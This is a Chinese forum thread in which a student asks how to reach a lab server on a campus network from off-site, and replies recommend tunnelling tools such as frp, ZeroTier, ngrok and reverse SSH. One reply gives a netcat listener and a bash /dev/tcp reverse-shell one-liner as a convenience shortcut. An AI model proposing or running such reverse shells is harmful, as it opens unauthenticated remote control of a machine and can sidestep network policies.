小白求问，非内网访问 ssh 问题

zerotier 比楼上的都简单

python 有个 jumpserver, 简单说就是跳板机 /堡垒机, 不过... 反代不行么

免費的 ngork 公網服務： https://www.ngrok.cc/

买一个能联网的主机（下称 A ）放在校园网内，在这个机器 A 上运行 frp，在实验室的服务器连到这个机器 A 的 frp 上，Mac 连接那校园网的那个主机 A。
问题在于怎么知道主机 A 的校园网地址，比较缺德的方法是主机 A 给 255.255.255.255 发广播包，Mac 上收包就可以了
主机 A 可以使用各种派或者盒子

无需外网 ip，可以试试 smarGate： https://github.com/lazy-luo/smarGate

刚想来安利下 Sakura Frp 发现楼上已经有人发了。
内网穿透简直不要太简单，注册账号，添加隧道，下载客户端运行一气呵成，五分钟搞定。

添加隧道也是相当简单，首先点一下这个按钮
然后点击一下“随机端口”，最后点添加，完事了。

接着根据你的系统类型下载客户端，比如 Linux，那么就下载 Linux x86 或者 x64，下载后 chmod +x 设置权限最后运行即可，输入你的账号密码登录，选择一个服务器连接，然后 —— 开始玩耍吧

不先试试能不能直接访问吗？校园网是个大内网啊，你试试在实验室电脑上能否 ping 通你自己电脑，如果你们实验室要求不严那应该是能 ping 通的，再然后看有没有权限做端口转发了，IP 应该是 172 开头的。如果不能通那就只能用内网穿透了，还是建议先试试第一种方法，体验上会更好。

你这个需求是典型的“内网穿透”（其实不一定是穿透的公网，你有一个做跳板的就可以了）

@635614874 反弹 shell 概念挺多，但其实就两条命令就行，Mac 上装个 nc 命令（ net cat，一般 Linux 都有，但是 Mac 默认没有）。
然后 Mac 上运行 nc -lvp 12345 （看具体 nc 版本，有些 l、p 参数不能同时存在的，直接 nc -lv 12345 ），这句话是在 Mac 上启一个 TCP 服务监听 12345 端口。
然后在实验室机器上运行 bash -i >& /dev/tcp/123.123.123.123/12345 0>&1 把里面的 123.123.123.123 改成你 Mac 的 IP，12345 是端口。
然后你 Mac 上就可以直接操作实验室机器了。
就装个 Map 没自带的 NetCat，就两条命令，不用任何配置文件，不需要中间跳板，不需要公网，只要两个设备其中一个能访问到另一个即可，比楼上各位都简单。随用随开，用完 ctrl+c 即可退出。

附我觉得对反弹 shell 讲的比较详细的原理文章：
https://xz.aliyun.com/t/2548
https://xz.aliyun.com/t/2549

frp

反向 ssh autossh

zerotier，实验室的 linux 配置一下 iptables，然后 zerotier 允许这台 linux 作为桥接，把实验室内网网段路由过去，就可以在 mac 上远程访问整个实验室内网了。

如果有一台云服务器的话，再搭一个 moon，首次连接的速度飞快

可以参考一下 nps 中的 p2p 服务
[github 地址]( https://github.com/cnlh/nps)

这个东西无论是 google 还是垃圾百度不是一堆方法吗？

@zhao305149619 是，自己也搜索过，但是有点盲人摸象的感觉，好像每种方法都可以但情况又不完全相同，所以来问一下大家

按你所说，我觉得实验室和校园网应该是互通的，你可以尝试遗漏做法

@aaaaasam 一楼。。。。

@aaaaasam 遗漏做法是指？实验室的内网是可以连到校园网的，但是我通过校园网 ping 不通实验室电脑的 ip

你如果有服务器就 frp 一个最好，理论上校园网是一个大局域网，可以在实验室的路由器设置一个花生壳的 DDNS 最端口转发应该也可以。